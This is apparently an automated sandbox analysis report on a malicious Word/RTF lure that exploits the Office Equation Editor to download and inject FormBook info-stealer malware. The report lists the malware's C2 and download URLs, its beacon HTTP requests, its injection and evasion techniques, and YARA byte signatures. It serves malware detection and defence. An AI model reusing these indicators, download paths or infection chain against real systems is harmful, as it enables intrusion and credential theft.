Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Revised RFQ-PO180911.doc

Overview

General Information

Sample Name:Revised RFQ-PO180911.doc
Analysis ID:635413
MD5:afaa3f4a9a241593ea30e05773c22980
SHA1:1d9dabc7f48e7d3c50c3d7d36a371be6bb63746d
SHA256:25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519
Tags:docRFQ
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2068 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1544 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 1988 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: C6E799EEEBA0345DE98B4E9A6AC76B82)
      • dvukljmnr.exe (PID: 2844 cmdline: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw MD5: 9CECB9E88C1FF3D7A4FFC8BFEB27C2E1)
        • dvukljmnr.exe (PID: 940 cmdline: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw MD5: 9CECB9E88C1FF3D7A4FFC8BFEB27C2E1)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • wuapp.exe (PID: 2996 cmdline: C:\Windows\SysWOW64\wuapp.exe MD5: C8EBA45CEF271BED6C2F0E1965D229EA)
              • cmd.exe (PID: 1820 cmdline: /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Revised RFQ-PO180911.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x5c:$obj2: \objdata
  • 0x7d:$obj2: \objdata
  • 0x315:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.0.dvukljmnr.exe.400000.9.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.0.dvukljmnr.exe.400000.9.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.0.dvukljmnr.exe.400000.9.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
        5.2.dvukljmnr.exe.160000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.dvukljmnr.exe.160000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Signatures

          Exploits

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 194.9.94.86, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1544, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1544, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}
          Multi AV Scanner detection for submitted file
          Source: Revised RFQ-PO180911.docVirustotal: Detection: 31%Perma Link
          Source: Revised RFQ-PO180911.docReversingLabs: Detection: 32%
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://sanbarts.com/cssati.exeAvira URL Cloud: Label: malware
          Source: http://www.sanbarts.com/cssati.exeAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmpAvira: detection malicious, Label: EXP/CVE-2018-0798.Gen
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exeReversingLabs: Detection: 61%
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeReversingLabs: Detection: 69%
          Source: C:\Users\user\AppData\Roaming\word.exeReversingLabs: Detection: 61%
          Source: 6.0.dvukljmnr.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.dvukljmnr.exe.160000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.dvukljmnr.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.dvukljmnr.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.dvukljmnr.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
          Office equation editor establishes network connection
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 194.9.94.86 Port: 80
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 45.120.185.113 Port: 80
          Source: ~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp.0.drStream path '_1715191568/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\krajo\ynpcjm\ntdn\3216792803f64d1292a50b8c7f0c4afc\ibwuyp\qahbtotu\Release\qahbtotu.pdb source: word.exe, 00000004.00000002.945823698.0000000002800000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp, dvukljmnr.exe, 00000005.00000000.914293624.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, dvukljmnr.exe, 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1182845110.000000000244F000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182267839.00000000002C2000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe.4.dr, nstBFBE.tmp.4.dr
          Source: Binary string: wntdll.pdb source: dvukljmnr.exe, dvukljmnr.exe, 00000006.00000003.923098867.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.984351623.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000003.925762664.0000000000740000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000002.1182604769.00000000020D0000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.985104310.00000000009A0000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.983888458.0000000000840000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuapp.pdb source: dvukljmnr.exe, 00000006.00000002.984008037.0000000000504000.00000004.00000020.00020000.00000000.sdmp, dvukljmnr.exe, 00000006.00000002.983799814.0000000000030000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004026A1 FindFirstFileA,
          Source: global trafficDNS query: name: sanbarts.com
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.paypal-caseid521.com
          Source: C:\Windows\explorer.exeNetwork Connect: 98.137.244.37 80
          Source: C:\Windows\explorer.exeDomain query: www.storyofsol.com
          Source: C:\Windows\explorer.exeDomain query: www.createacarepack.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.rthearts.com/nk6l/
          Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
          Source: Joe Sandbox ViewASN Name: YAHOO-GQ1US YAHOO-GQ1US
          Source: global trafficHTTP traffic detected: GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1Host: www.createacarepack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 26 May 2022 00:40:19 GMTAccept-Ranges: bytesETag: "4042e42c9970d81:0"Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 27 May 2022 19:20:07 GMTContent-Length: 299113Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 71 4a a8 a1 10 24 fb a1 10 24 fb a1 10 24 fb 2f 18 7b fb a3 10 24 fb a1 10 25 fb 3b 10 24 fb 22 18 79 fb b0 10 24 fb f5 33 14 fb a8 10 24 fb 66 16 22 fb a0 10 24 fb 52 69 63 68 a1 10 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b6 ce 69 46 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 fa 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7a 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sanbarts.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.sanbarts.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 19:21:49 GMTP3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"Vary: Accept-EncodingContent-Length: 73Content-Type: text/html; charset=iso-8859-1Age: 0Connection: closeServer: ATSData Raw: 3c 68 31 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 34 39 37 41 39 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 27 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
